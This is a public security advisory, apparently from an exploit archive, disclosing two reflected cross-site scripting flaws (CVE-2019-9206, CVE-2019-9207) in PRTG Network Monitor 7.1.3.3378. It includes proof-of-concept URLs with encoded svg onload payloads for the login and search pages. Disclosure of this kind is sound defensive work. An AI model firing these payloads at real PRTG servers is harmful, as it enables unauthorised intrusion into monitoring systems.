PRTG Network Monitor version 7.1.3.3378 suffers from multiple cross site scripting vulnerabilities.
ced473addd9d72db8d0bc103a9c6e662
In 2009...
<!--
# Exploit Title: Cross Site Scripting in PRTG Network Monitor v7.1.3.3378
# Date: 17-02-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.paessler.com/prtg
# Software Link: http://www.paessler.com/prtg
# Version: PRTG Network Monitor v7.1.3.3378
# Tested on: All
# CVE : CVE-2019-9206
# Category: webapps
1. Description
PRTG Network Monitor v7.1.3.3378 allows XSS via the /public/login.htm,
errormsg or loginurl parameter. NOTE: This product is discontinued. Update
to last version.
2. Proof of Concept
http://X.X.X.X/public/login.htm?errormsg=&loginurl=%22%3E%3Csvg%20onload=prompt%28/XSS/%29%3E
http://X.X.X.X/public/login.htm?errormsg=%22%3E%3Csvg%20onload=prompt%28/XSS/%29%3E&loginurl=XSS
3. Solution:
The product is discontinued. Update to last version.
-->
<!--
# Exploit Title: Cross Site Scripting in PRTG Network Monitor v7.1.3.3378
# Date: 17-02-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.paessler.com/prtg
# Software Link: http://www.paessler.com/prtg
# Version: PRTG Network Monitor v7.1.3.3378
# Tested on: All
# CVE : CVE-2019-9207
# Category: webapps
1. Description
PRTG Network Monitor v7.1.3.3378 allows XSS via the /search.htm, searchtext
parameter. NOTE: This product is discontinued. Update to last version.
2. Proof of Concept
http://X.X.X.X/search.htm?searchtext=%22%3E%3Csvg%20onload=prompt%28/XSS/%29%3E
3. Solution:
The product is discontinued. Update to last version.
-->